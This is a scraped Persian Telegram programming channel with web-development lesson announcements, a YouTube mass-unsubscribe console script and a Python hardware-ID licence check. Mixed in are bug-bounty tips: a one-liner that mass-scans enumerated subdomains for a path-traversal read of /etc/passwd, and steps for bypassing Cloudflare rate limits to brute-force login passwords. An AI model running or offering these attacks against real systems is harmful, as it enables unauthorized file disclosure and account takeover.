Forwarded from برنامه نویسی با طعم تمشک - آموزش
Media is too big
VIEW IN TELEGRAM
💢 فصل اول آموزش Full stack web developer
💢 عنوان فصل HTML & CSS - قسمت ۱۵
💢 مباحث تدریس شده:
✅ استفاه از emoji در HTML
✅ انتخاب المان بر اساس رتبه قرار گیری first-child, last-child, nth-child
✅ ادامه بحث position و مقدار fixed
✅ کسب مهارت بیشتر در inspector
✅ معرفی ویژگی های CSS از جمله:
transition, transition-delay
#فیلم_آموزش #FullStackWebDeveloper
⭕️ با انتشار این مطلب ما را حمایت کنید.
👇 تمرین این جلسه کانال «برنامهنویسی با طعم تمشک»
@xstack_tut 👻 | @devefun ✌️
💢 عنوان فصل HTML & CSS - قسمت ۱۵
💢 مباحث تدریس شده:
✅ استفاه از emoji در HTML
✅ انتخاب المان بر اساس رتبه قرار گیری first-child, last-child, nth-child
✅ ادامه بحث position و مقدار fixed
✅ کسب مهارت بیشتر در inspector
✅ معرفی ویژگی های CSS از جمله:
transition, transition-delay
#فیلم_آموزش #FullStackWebDeveloper
⭕️ با انتشار این مطلب ما را حمایت کنید.
👇 تمرین این جلسه کانال «برنامهنویسی با طعم تمشک»
@xstack_tut 👻 | @devefun ✌️
❤🔥4❤2
==============================
بعضی وقتها پیش میاد که میخواید تمام کسانی که سابسکرایب کردین رو همزمان آن سابسکرایب کنید.
مرحله ۱- این لینک رو باز کنید: https://www.youtube.com/feed/channels
مرحله ۲- F۱۲ رو بفشارید.
مرحله ۳- در قسمت اینسپکت در نوار بالا به کنسول بروید و اسکریپت زیر را پست کنید.
مرحله ۴- اینتر را بزنید
==============================
SCRIPT
var i = 0;
var count = document.querySelectorAll("ytd-channel-renderer:not(.ytd-item-section-renderer)");
myTimer();
function myTimer () {
if (count == 0) return;
el = document.querySelector('.ytd-subscribe-button-renderer');
el.click();
setTimeout(function () {
var unSubBtn = document.getElementById("confirm-button").click();
i++;
count--;
console.log(i + " unsubscribed");
console.log(count + " remaining");
setTimeout(function () {
el = document.querySelector("ytd-channel-renderer");
el.parentNode.removeChild(el);
myTimer();
}, 250);
}, 250);
}
==============================@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7⚡4
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9
Please open Telegram to view this post
VIEW IN TELEGRAM
دوستان برنامه نویس حتما حواستون به این موضوع باشه :
I just got a $15,000 #BugBounty for a UUID-based IDOR that led to an account takeover 🥷
Interestingly, the application used some fixed UUIDs like 00000000-0000-0000-0000-000000000000 and 11111111-1111-1111-1111-111111111111 for some _administrative_ users 🤷♂️
Link of tweet
#security
#InfoSec
@devefun🙃
I just got a $15,000 #BugBounty for a UUID-based IDOR that led to an account takeover 🥷
Interestingly, the application used some fixed UUIDs like 00000000-0000-0000-0000-000000000000 and 11111111-1111-1111-1111-111111111111 for some _administrative_ users 🤷♂️
Link of tweet
#security
#InfoSec
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
🐳8
برنامه نویسی به شرط خنده | Developer funs
دوستان برنامه نویس حتما حواستون به این موضوع باشه : I just got a $15,000 #BugBounty for a UUID-based IDOR that led to an account takeover 🥷 Interestingly, the application used some fixed UUIDs like 00000000-0000-0000-0000-000000000000 and 11111111-1111-1111…
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😐12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
https://attacker-codeninja.github.io/2022-06-06-awesome-bug-bounty-roadmap/
این رود مپ برای کسایی که میخان وارد باگ بانتی و یا هک اپلیکیشن ها ( معمولا وب اپلیکیشن ) بشن هستش
اگه نیاز دیدین که ترجمه بشه و جاییشو متوجه نشدین تو کامنتا بگین😍 ( هر چند باید زبانتون در حدی باشه که اینارو متوجه بشین )
#BugBounty #RoadMap
@devefun😝
این رود مپ برای کسایی که میخان وارد باگ بانتی و یا هک اپلیکیشن ها ( معمولا وب اپلیکیشن ) بشن هستش
اگه نیاز دیدین که ترجمه بشه و جاییشو متوجه نشدین تو کامنتا بگین
#BugBounty #RoadMap
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
attacker-codeninja.github.io
Awesome Bug Bounty Roadmap
👍4
Media is too big
VIEW IN TELEGRAM
💢 فصل اول آموزش Full stack web developer
💢 عنوان فصل HTML & CSS - قسمت ۱۶
💢 مباحث تدریس شده:
✅ استفاده از CDN ها و font awesome
✅ کمی در مورد ریسپانسیو کردن صفحه
✅ معرفی اندازه vw بر اساس عرض viewport
✅ کسب مهارت بیشتر در inspector
✅ معرفی ویژگی های CSS از جمله:
curser
#فیلم_آموزش #FullStackWebDeveloper
⭕️ با انتشار این مطلب ما را حمایت کنید.
👇 تمرین این جلسه کانال «برنامهنویسی با طعم تمشک»
@xstack_tut 👻 | @devefun ✌️
💢 عنوان فصل HTML & CSS - قسمت ۱۶
💢 مباحث تدریس شده:
✅ استفاده از CDN ها و font awesome
✅ کمی در مورد ریسپانسیو کردن صفحه
✅ معرفی اندازه vw بر اساس عرض viewport
✅ کسب مهارت بیشتر در inspector
✅ معرفی ویژگی های CSS از جمله:
curser
#فیلم_آموزش #FullStackWebDeveloper
⭕️ با انتشار این مطلب ما را حمایت کنید.
👇 تمرین این جلسه کانال «برنامهنویسی با طعم تمشک»
@xstack_tut 👻 | @devefun ✌️
❤🔥7
New Exploit 🔥🔥🔥🔥
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
#bugbountytips #bugbountytip #bugbounty
Source [ + bounter ]
@devefun😝
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
#bugbountytips #bugbountytip #bugbounty
Source [ + bounter ]
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
🤨9
💢 وی پی ان OpenVPN ( با سرعت فوقالعاده) 👌
🔸 اعتبار یک ماه [Next Update. 2022-09-22]
🔹 دوستان خواهشا، فقط برای برنامه نویسها ارسال کنند
⚠️ عواقب استفاده غیر از موارد مجاز به عهده استفاده کننده می باشد
✅ فایل کانفیگ در قسمت کامنت ها
USR: devefun
PIN: 121212
🔸 ماه های آینده آپدیت تو کانال اعلام میشود 😉↙️
[دوستان لطفا به درستی از وی پی ان استفاده کنین... این بار چندمه که سرور یا داغون میشه یا داون میشه...]
@devefun😍
🔸 اعتبار یک ماه [Next Update. 2022-09-22]
🔹 دوستان خواهشا، فقط برای برنامه نویسها ارسال کنند
⚠️ عواقب استفاده غیر از موارد مجاز به عهده استفاده کننده می باشد
✅ فایل کانفیگ در قسمت کامنت ها
USR: devefun
PIN: 121212
🔸 ماه های آینده آپدیت تو کانال اعلام میشود 😉↙️
[دوستان لطفا به درستی از وی پی ان استفاده کنین... این بار چندمه که سرور یا داغون میشه یا داون میشه...]
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Bypass Cloudflare Rate Limit 2022 🔥🔥🔥
1. Go to login page
2. Enter credentials
3. Send request to intruder
4. Set change position for host header
5. Set change position for password
6. Enjoy brute forcing
#bugbountytips
Bypass Cloudflare Rate Limit
By 'Srivastava'
https://github.com/NafisiAslH/KnowledgeSharing/blob/main/CyberSecurity/Web/BugBountyTips/RateLimitBypass/20220823%20-%20Bypassing%20Cloudflare%20Rate%20Limit.md
Note: This trick works when unknown subdomains are redirected to main subdomain.
@devefun => join us👏
1. Go to login page
2. Enter credentials
3. Send request to intruder
4. Set change position for host header
5. Set change position for password
6. Enjoy brute forcing
#bugbountytips
Bypass Cloudflare Rate Limit
By 'Srivastava'
https://github.com/NafisiAslH/KnowledgeSharing/blob/main/CyberSecurity/Web/BugBountyTips/RateLimitBypass/20220823%20-%20Bypassing%20Cloudflare%20Rate%20Limit.md
Note: This trick works when unknown subdomains are redirected to main subdomain.
@devefun => join us
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
پروژهٔ خود را با استفاده از HWID محافظت کنید. 🐍 [python]
کد را در ابتدای پروژه خود اضافه کنید.
یک فایل TXT بسازید و اون رو داخل سرور خودتون آپلود کنید.
به فایل TXT که ساختین hardware IDs اضافه کنید.
مثال: https://devefun.com/hardware-ids.txt
لینک رو جایگزین `
✌️
کد را در ابتدای پروژه خود اضافه کنید.
یک فایل TXT بسازید و اون رو داخل سرور خودتون آپلود کنید.
به فایل TXT که ساختین hardware IDs اضافه کنید.
مثال: https://devefun.com/hardware-ids.txt
لینک رو جایگزین `
TYPE SITE HERE ` کنید.import subprocess, requests, time, os@devefun
hardwareid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
site = requests.get('TYPE SITE HERE')
try:
if hardwareid in site.text:
pass
else:
print('[ERROR] HWID NOT in database')
print('[HWID:' + hardwareid + ']')
time.sleep(5)
os._exit()
except:
print('[ERROR] FAILED to connect to database')
time.sleep(5)
os._exit()
print('Success.')
Please open Telegram to view this post
VIEW IN TELEGRAM
👌2👍1